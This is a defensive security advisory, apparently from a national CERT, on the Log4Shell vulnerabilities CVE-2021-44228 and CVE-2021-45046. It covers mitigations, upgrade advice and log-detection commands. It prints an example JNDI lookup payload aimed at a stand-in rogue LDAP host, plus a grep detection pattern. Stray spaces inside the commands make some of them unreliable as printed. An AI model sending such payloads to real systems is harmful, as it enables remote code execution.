Ελληνικά
A critical vulnerability (CVE-2021-44228) has recently been discovered that affects Log4j versions from 2.0-beta9 to 2.14.1, and is critical as it can be remotely exploited by a non-authenticated attacker allowing remote code execution (RCE). The vulnerability is rated 10 out of 10 in the Common Vulnerability Rating System (CVSS), which describes how serious the vulnerability is.
Log4j is a popular Java library developed and maintained by Apache. It has been widely adopted and used in many commercial and open source software products as a logging framework for Java.
The vulnerability arises from the way logs are handled by the log4j processor. If an attacker sends a specially formatted message (contains a string such as $ {jndi: ldap: //rogueldapserver.com/a}), this could result in the loading of an external code class or message retrieval and execution of this code, leading to a situation known as Remote Code Execution (RCE).
(Update 15-12-2021) New Vulnerability CVE-2021-45046: Vulnerability for vulnerability CVE-2021-44228 in Apache Log4j 2.15.0 was found to be incomplete in some non-default settings. This could allow attackers to control Thread Context Map (MDC) input when the log setting uses a non-default pattern layout with either Context Lookup (for example, $$ {ctx: loginId}) or Thread Context Map pattern (% X,% mdc or% MDC) to generate malicious input data using a JNDI search pattern leading to a denial of service (DOS) attack. Log4j 2.15.0 makes every effort to restrict JNDI LDAP searches to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message retrieval patterns and disabling JNDI functionality by default.
Measures
– Immediate upgrade to version 2.15.0 of the software is recommended. From Log4j 2.15.0 this feature is now disabled by default. Care must be taken that this option is NOT activated incorrectly in version 2.15.0. If upgrading to version 2.15.0 is not possible, follow the following restriction measures.
(Update 15-12-2021) It is proposed the immediate upgrade to version 2.16.0 of the software in order to mitigate both vulnerabilities CVE-2021-45046 and CVE-2021-44228.
– In versions> = 2.10, this behavior can be mitigated by setting either the system property “log4j2.formatMsgNoLookups” or the environmental variable “LOG4J_FORMAT_MSG_NO_LOOKUPS” to “true”.
– For versions> = 2.7 and <= 2.14.1, all PatternLayout patterns can be modified to set the message converter as “% m {nolookups}” instead of “% m”.
For versions> = 2.0-beta9 and <= 2.10.0, the mitigation is to remove the “JndiLookup” class from the path with the following command: zip -q -d log4j-core – * .jar org / apache / logging / log4j / core / lookup / JndiLookup.class
(Update 15-12-2021): The developers of Log4j have released a new version of Log4j 2.16.0. The new version Log4j 2.16.0 disables the JNDI functionality by default. Message Lookups support has also been removed. For more information:
https://lists.apache.org/thread/d6v4r6nosxysyq9rvnr779336yf0woz4
Detection
You can check for attempts to exploit it – whether successful or not – in the web server logs using the following command:
sudo egrep -i -r ‘\ $ \ {jndi: (ldap [s]? | rmi | dns): / [^ \ n] +’ / var / log /
or using regex:
\ $ {(\ $ {(. * ?: |. *?:. *?: -) (‘| “|`) * (? 1)} * | [jndi: lapsrm] (‘ | “|`) *} *) {9,11}
Check your network perimeter logs for the presence of an IOC list.
Updates – information
A vulnerability has been created in Github which concerns the vulnerability which is constantly updated to inform the organizations in the following hyperlink and includes a list of affected systems, breach indicators (IoCs), remedial measures, detection methods, etc.
https://github.com/NCSC-NL/log4shell
We urge you to check your infrastructure for using Log4j and apply the corresponding patches as soon as possible. Organizations are advised to regularly check the list on GitHub for updates related to their organization. In addition to a list of software and patches, GitHub also provides an overview of tools, IoC, and Yara rules.
Please share any information / detection efforts on your networks in order to find possible breach indicators (IoCs).
Sources:
https://logging.apache.org/log4j/2.x/security.html
https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/
https://github.com/NCSC-NL/log4shell
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://www.ncsc.nl/actueel/advisory?id=NCSC-2021-1052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046